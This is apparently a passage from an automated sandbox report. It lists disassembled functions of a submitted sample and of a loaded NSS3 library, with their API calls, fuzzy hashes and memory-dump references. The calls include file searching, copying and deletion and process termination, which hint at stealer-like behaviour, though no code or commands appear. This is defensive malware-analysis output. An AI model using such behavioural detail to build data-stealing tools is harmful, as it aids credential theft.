Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID:
API String ID: 3986731826-0
Opcode ID: 6cba1287d9517a4910f13f83d366cf7e81c874702127e72c99d2913431c6388d
Instruction ID: eed79dd48cceaa96856aa53de9fe6bc349985206b534f533b41e38bbe5ca6ea1
Opcode Fuzzy Hash: 6cba1287d9517a4910f13f83d366cf7e81c874702127e72c99d2913431c6388d
Instruction Fuzzy Hash: 29418B718001589FCF50DF69D880ADEBBFAFF4A300F10416AE854EB266D3349945CF60

Function 0062D562 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0062D5A7
_memmove.LIBCMT ref: 0062D5BB
_memmove.LIBCMT ref: 0062D608
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,0062C64D,?,00000001,?,?,?), ref: 0062D627

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: _memmove$FileWritemalloc
String ID:
API String ID: 803809635-0
Opcode ID: 473a97827c8832e110e2bbd4118c8597eb2d1934a923f47d1c591a9abe3f7059
Instruction ID: 535c9894accb4c764d313c85808dd3b8c1170930405a7c453d78cb7615ab00ed
Opcode Fuzzy Hash: 473a97827c8832e110e2bbd4118c8597eb2d1934a923f47d1c591a9abe3f7059
Instruction Fuzzy Hash: 67316DB1600B14AFD760CF55E980AA7B7FABB48754F40892EE94AC7A40DB70F905CF50

Function 006240F6 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0062411D

Part of subcall function 006239BD: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00624147,?), ref: 006239C8
Part of subcall function 006239BD: HeapAlloc.KERNEL32(00000000), ref: 006239CF
Part of subcall function 006239BD: wsprintfW.USER32 ref: 006239E0

OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 006241C3
TerminateProcess.KERNEL32(00000000,00000000), ref: 006241D1
CloseHandle.KERNEL32(00000000), ref: 006241D8

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
String ID:
API String ID: 2224742867-0
Opcode ID: af44ccbec7d8488c8c6473dcdc2a2c207abd782cec2a8d5d60311f872c32c768
Instruction ID: 9886ec865bd6badf02bc35236caccf3bd53601053d2c856f071736b18cfda7d3
Opcode Fuzzy Hash: af44ccbec7d8488c8c6473dcdc2a2c207abd782cec2a8d5d60311f872c32c768
Instruction Fuzzy Hash: 49314F76A01628AFDB209F64DC849EEB7BDFF06345F0400A5F90AD2550DA359F85CF52

Function 6C43DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C43DDB1,?,00000000), ref: 6C43DDF4

Part of subcall function 6C4414C0: TlsGetValue.KERNEL32 ref: 6C4414E0
Part of subcall function 6C4414C0: EnterCriticalSection.KERNEL32 ref: 6C4414F5
Part of subcall function 6C4414C0: PR_Unlock.NSS3 ref: 6C44150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C43DDB1,?,00000000), ref: 6C43DE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C43DDB1,?,00000000), ref: 6C43DE17

Part of subcall function 6C440BE0: malloc.MOZGLUE(6C438D2D,?,00000000,?), ref: 6C440BF8
Part of subcall function 6C440BE0: TlsGetValue.KERNEL32(6C438D2D,?,00000000,?), ref: 6C440C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C43DE80

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: 922c0dd15dd6d8b4034c8778f96abb0ff58a78247b65fa67a964de639f013561
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: 4531C2B1915B529BE700CF57D881E52BBA4FFE9318B24922ED81D87B41E770E4A4CBC0

Function 006283AE Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00623A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00623A59

lstrcatA.KERNEL32(?,00000000), ref: 006283F6
lstrcatA.KERNEL32(?,00647B8C), ref: 00628413
lstrcatA.KERNEL32(?), ref: 00628426
lstrcatA.KERNEL32(?,00647B90), ref: 00628438

Part of subcall function 00627D20: wsprintfA.USER32 ref: 00627D67
Part of subcall function 00627D20: FindFirstFileA.KERNEL32(?,?), ref: 00627D7E
Part of subcall function 00627D20: StrCmpCA.SHLWAPI(?,00647AF4), ref: 00627D9F
Part of subcall function 00627D20: StrCmpCA.SHLWAPI(?,00647AF8), ref: 00627DB9
Part of subcall function 00627D20: wsprintfA.USER32 ref: 00627DE0
Part of subcall function 00627D20: StrCmpCA.SHLWAPI(?,006476B6), ref: 00627DF4
Part of subcall function 00627D20: wsprintfA.USER32 ref: 00627E11
Part of subcall function 00627D20: PathMatchSpecA.SHLWAPI(?,?), ref: 00627E3E
Part of subcall function 00627D20: lstrcatA.KERNEL32(?), ref: 00627E74
Part of subcall function 00627D20: lstrcatA.KERNEL32(?,00647B10), ref: 00627E86
Part of subcall function 00627D20: lstrcatA.KERNEL32(?,?), ref: 00627E99
Part of subcall function 00627D20: lstrcatA.KERNEL32(?,00647B14), ref: 00627EAB
Part of subcall function 00627D20: lstrcatA.KERNEL32(?,?), ref: 00627EBF

Part of subcall function 00627D20: wsprintfA.USER32 ref: 00627E28
Part of subcall function 00627D20: CopyFileA.KERNEL32(?,?,00000001), ref: 00627F78
Part of subcall function 00627D20: DeleteFileA.KERNEL32(?), ref: 00627FEC
Part of subcall function 00627D20: FindNextFileA.KERNEL32(?,?), ref: 0062804E
Part of subcall function 00627D20: FindClose.KERNEL32(?), ref: 00628062

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: c8d6f2690cfd94d65d5614bd5bbeaf4cb0983ca66d9d54ad40b82518f7e2f236
Instruction ID: 39a98f664cc532ddcace2895fe777d589fc784ccce6ef7da7995746ac5b9d7e0
Opcode Fuzzy Hash: c8d6f2690cfd94d65d5614bd5bbeaf4cb0983ca66d9d54ad40b82518f7e2f236
Instruction Fuzzy Hash: 3921B03594421CABCF90EF64DC46AD9B7BEFF15301F4044A5A684A3251EFB9AAC48F80

Function 6C452DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C452E08

Part of subcall function 6C4414C0: TlsGetValue.KERNEL32 ref: 6C4414E0
Part of subcall function 6C4414C0: EnterCriticalSection.KERNEL32 ref: 6C4414F5
Part of subcall function 6C4414C0: PR_Unlock.NSS3 ref: 6C44150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C452E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C452E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C452E95

Part of subcall function 6C441200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C3E88A4,00000000,00000000), ref: 6C441228
Part of subcall function 6C441200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C441238
Part of subcall function 6C441200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C3E88A4,00000000,00000000), ref: 6C44124B
Part of subcall function 6C441200: PR_CallOnce.NSS3(6C542AA4,6C4412D0,00000000,00000000,00000000,?,6C3E88A4,00000000,00000000), ref: 6C44125D
Part of subcall function 6C441200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C44126F
Part of subcall function 6C441200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C441280
Part of subcall function 6C441200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C44128E
Part of subcall function 6C441200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C44129A
Part of subcall function 6C441200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C4412A1

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 4f6e61d823680d18f55c2c879422b9685f04a1df8504838ce7d173fb93038456
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 1F21F6B1E003854BF710CF549D44FAA3764AFA134DF61426ADD086B742FBB1E6A882D2

Function 6C40ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C40ACC2

Part of subcall function 6C3E2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C3E2F0A
Part of subcall function 6C3E2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C3E2F1D

Part of subcall function 6C3E2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C3E0A1B,00000000), ref: 6C3E2AF0
Part of subcall function 6C3E2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3E2B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C40AD5E

Part of subcall function 6C4257D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C3EB41E,00000000,00000000,?,00000000,?,6C3EB41E,00000000,00000000,00000001,?), ref: 6C4257E0
Part of subcall function 6C4257D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C425843

CERT_DestroyCertList.NSS3(?), ref: 6C40AD36

Part of subcall function 6C3E2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C3E2F65
Part of subcall function 6C3E2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C3E2F83

free.MOZGLUE(?), ref: 6C40AD4F

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 91c4a87d8b9be5689f605719e1fd664d8cc6ab634c6c48a842625abef626e6a6
Instruction ID: 4b17085bb1dd628e0f60f7c1704c593de1106f80624b85f88af8ff9cd846783f
Opcode Fuzzy Hash: 91c4a87d8b9be5689f605719e1fd664d8cc6ab634c6c48a842625abef626e6a6
Instruction Fuzzy Hash: 0A21C3B1E402188BEB10DF64D905DEEB7B4EF09219F054079D848BB701FB31AA59CBE6

Function 6C433C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C433C9E
EnterCriticalSection.KERNEL32(?), ref: 6C433CAE
PR_Unlock.NSS3(?), ref: 6C433CEA
PR_SetError.NSS3(00000000,00000000), ref: 6C433D02

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: b0b45516222dc08e2307c39045947b4c8fcb9d9f5ff5133e35a01b63f8942636
Instruction ID: 143239315606984fa12158eef42b1782eb22fa727848c7fbb132df121b927a11
Opcode Fuzzy Hash: b0b45516222dc08e2307c39045947b4c8fcb9d9f5ff5133e35a01b63f8942636
Instruction Fuzzy Hash: 6511E476A012149FD700EF25EC44E9A3778EF89329F055164EC088B712E730ED51CBE0

Function 6C43ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C43F0AD,6C43F150,?,6C43F150,?,?,?), ref: 6C43ECBA

Part of subcall function 6C440FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3E87ED,00000800,6C3DEF74,00000000), ref: 6C441000
Part of subcall function 6C440FF0: PR_NewLock.NSS3(?,00000800,6C3DEF74,00000000), ref: 6C441016
Part of subcall function 6C440FF0: PL_InitArenaPool.NSS3(00000000,security,6C3E87ED,00000008,?,00000800,6C3DEF74,00000000), ref: 6C44102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C43ECD1

Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C4410F3
Part of subcall function 6C4410C0: EnterCriticalSection.KERNEL32(?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44110C
Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441141
Part of subcall function 6C4410C0: PR_Unlock.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441182
Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C43ED02

Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C43ED5A

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 88846538701e6c909a029e6bd86c2ae5d1c14a77579430f5994993c1dfdc5ae1
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 9F2192B19017529BE700CF26D944F52B7E4BFE8349F25D219A81C87B61EB70E994CAD0

Function 6C46EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C457FFA,?,6C459767,?,8B7874C0,0000A48E), ref: 6C46EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C457FFA,?,6C459767,?,8B7874C0,0000A48E), ref: 6C46EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C457FFA,?,6C459767,?,8B7874C0,0000A48E), ref: 6C46EE14

Part of subcall function 6C440BE0: malloc.MOZGLUE(6C438D2D,?,00000000,?), ref: 6C440BF8
Part of subcall function 6C440BE0: TlsGetValue.KERNEL32(6C438D2D,?,00000000,?), ref: 6C440C15

memcpy.VCRUNTIME140(?,?,6C459767,00000000,00000000,6C457FFA,?,6C459767,?,8B7874C0,0000A48E), ref: 6C46EE33

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: b851fc2911378067c8b0b655f516056983d57b9daec760a4596cf8abc483d870
Instruction ID: eb0d64662221045ff7ab68a7a8a70f7a8c6a61e799412d23e9d7f79168152b91
Opcode Fuzzy Hash: b851fc2911378067c8b0b655f516056983d57b9daec760a4596cf8abc483d870
Instruction Fuzzy Hash: A91170B1A01716ABEB10DE66DCC4F46B3E8EB0435EF244535E91986F45E331F46487E1

Function 6C408DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C408DE7
EnterCriticalSection.KERNEL32 ref: 6C408DFC
PR_Unlock.NSS3 ref: 6C408E2D
PR_SetError.NSS3 ref: 6C408E49

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 1be91be1abd02ed42bd70db4e85faea023770c0c7e3ad5f819855ac8cc1aaefc
Instruction ID: ec02ca0a8563ab87d03e4761a78ba4dc2063b371e5024c0d68b548563ace185a
Opcode Fuzzy Hash: 1be91be1abd02ed42bd70db4e85faea023770c0c7e3ad5f819855ac8cc1aaefc
Instruction Fuzzy Hash: 0C116D716056109BD700FF38D544A6ABBF4BF05314F024929D888DBB00E730E8A4CBC2

Function 6C48AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C475F17,?,?,?,?,?,?,?,?,6C47AAD4), ref: 6C48AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C475F17,?,?,?,?,?,?,?,?,6C47AAD4), ref: 6C48ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C47AAD4), ref: 6C48ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C47AAD4), ref: 6C48ACDB

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 353f23e5d99a53940a2cdb0f6bf394a2e1d2b6cd5ef3084964dd190750b84b4e
Instruction ID: 1b1127e8794b0210a0d8f8a46f3aa03117342009bb4052656c4c981b6b99e0ef
Opcode Fuzzy Hash: 353f23e5d99a53940a2cdb0f6bf394a2e1d2b6cd5ef3084964dd190750b84b4e
Instruction Fuzzy Hash: CB014CB1602B159BE760DF2AD908B57B7E8FF0065AB104839D85EC7B40E771F054CB91

Function 6C3F1DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6C3F1DFB

Part of subcall function 6C3E95B0: TlsGetValue.KERNEL32(00000000,?,6C4000D2,00000000), ref: 6C3E95D2
Part of subcall function 6C3E95B0: EnterCriticalSection.KERNEL32(?,?,?,6C4000D2,00000000), ref: 6C3E95E7
Part of subcall function 6C3E95B0: PR_Unlock.NSS3(?,?,?,?,6C4000D2,00000000), ref: 6C3E9605

PR_EnterMonitor.NSS3 ref: 6C3F1E09

Part of subcall function 6C4A9090: TlsGetValue.KERNEL32 ref: 6C4A90AB
Part of subcall function 6C4A9090: TlsGetValue.KERNEL32 ref: 6C4A90C9
Part of subcall function 6C4A9090: EnterCriticalSection.KERNEL32 ref: 6C4A90E5
Part of subcall function 6C4A9090: TlsGetValue.KERNEL32 ref: 6C4A9116
Part of subcall function 6C4A9090: LeaveCriticalSection.KERNEL32 ref: 6C4A913F

